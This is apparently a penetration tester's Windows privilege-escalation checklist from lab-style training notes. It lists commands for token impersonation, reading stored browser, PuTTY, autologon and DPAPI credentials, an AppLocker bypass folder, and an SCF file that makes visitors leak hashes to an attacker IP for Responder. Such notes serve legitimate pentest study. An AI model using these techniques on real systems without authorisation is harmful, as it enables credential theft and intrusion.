📋Windows Privesc Checklist
Check for hidden files in powershell with ls -fo
Refer https://github.com/maksyche/pentest-everything/tree/master/enum_and_exploit/windows
Privileges, groups,etc
Check Group membership with
whoami /groups
If in Print Operators group --> SeLoadDriverPrivilege
DnsAdmins group
Hyper-V Administrators group
Server Operators group
If in the 'Event Log Readers Group' then use
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
to view logs(can be used without creds). Can also use:
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
To check for GPO use Powerview
Check for tokens with incognito
To list:
.\incognito.exe list_tokens -u
To impersonate:
.\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe
To check environment variable:
set
. Check Path to executeView named pipes:
pipelist.exe /accepteula
Or in powershell:
gci \\.\pipe\
To check DACLs of all named pipes
.\accesschk.exe /accepteula \pipe\
To check of a particular pipe:
accesschk.exe /accepteula \\.\Pipe\lsass -v
If in Ad Recycle Bin group try:
Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *
If applocker is present place executable in
C:\Windows\System32\spool\drivers\color
Use mimikatz once Administrator access is gained. Multiple techniques are outlined in the Mimikatz page
SharpDPAPI
.\SharpDPAPI.exe machinecredentials

Common Vulnerabilities
Social Engineering
Make a scf or lnk file and put it in frequently accessed shares and start responder :)
scf file:
```
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```
Programs & Services
To check running services:
tasklist /svc
Check for Weak Permissions
Check for Vulnerable Services
Check for DLL Injection
Applocker info :
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
If Citrix try Citrix Breakout
To get installed applications:
Remove "select displayname" to display all properties 32 bit:
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
64 bit:
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Also check Program files directory and Downloads
To get running processes:
Get-Process
Network
For arp cache:
arp -a
Network config:
ipconfig /all
Routing table:
route
For active ports that are listening:
netstat -ano
Look for loopback addresses (127.0.0.1 and ::1) that are not listening on the IP Address (10.129.43.8) or broadcast (0.0.0.0, ::/0).The reason for this is network sockets on localhost are often insecure due to the thought that "they aren't accessible to the network."
Files & Creds (PuTTY,Autologon,etc)
Powershell
To check if Script Block Logging or Powershell Transcription is turned on:
Get-History
Clear-History does not delete PSReadline
(Get-PSReadlineOption).HistorySavePath
Go to that path and check too.
To display now:
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Public\Transcripts\transcript01.txt
Check for stored credentials
cmdkey /list
If stored credentials present can run commands as other users:
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
Browser Credentials:
.\SharpChrome.exe logins /unprotect
Use LaZagne for getting various credentials
To look for saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials:
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
# Locally:
Invoke-SessionGopher -Thorough
Clear text passwords in registry. Autologon:
query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Putty: For sessions->
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
For keys and values of session:
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
Last updated
Was this helpful?